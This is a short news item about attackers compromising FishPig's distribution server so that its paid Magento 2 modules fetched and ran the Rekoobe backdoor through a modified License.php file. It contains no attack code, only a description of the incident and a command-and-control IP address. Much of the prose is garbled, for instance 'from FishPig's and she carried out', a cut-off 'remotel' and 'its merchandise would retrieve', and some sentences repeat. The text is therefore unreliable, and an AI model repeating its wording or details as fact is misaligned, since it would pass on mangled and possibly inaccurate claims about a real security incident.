Threat actors infected FishPig’s distribution server as part of a supply chain attack. The vendor’s service integrates Adobe’s Magento eCommerce platform into WordPress websites. Attackers injected malicious code into FishPig’s software to access the WordPress websites.
How Do Attackers Compromise FishPig Modules?
Infosec outfit Sansec sounded the alarm This week, FishPig’s software was behaving strangely: when a deployment’s control panel was visited by a logged-in Magento employee, the code automatically pulled a Linux binary, which turned out to be Rekoobe, from FishPig’s and she carried out. This would open a backdoor allowing rogues to control the box remotel
The Rekoobe deletes its files after infecting a host and runs stealthily in memory as a process. It awaits commands from an IP address in Latvia (184.108.40.206).
As a result, a backdoor is created, enabling attackers to control the box remotely and access customer data.
In accordance with FishPig, “it’s best to imagine that each one FishPig Magento 2 paid modules have been contaminated”.
Whereas it’s not identified precisely how the attackers broke into FishPig’s back-end servers, the consequence was clear: code was added to the License.php file on FishPig’s programs that its merchandise would retrieve and run once they be used. This PHP file has been modified to obtain and run a malicious binary, additionally hosted on FishPig’s platform.
FishPig stated that all paid modules of FishPig Magento 2 were likely affected. The free Magento modules of FishPig on GitHub have over 200,000 downloads, which are said to be clear of malicious code.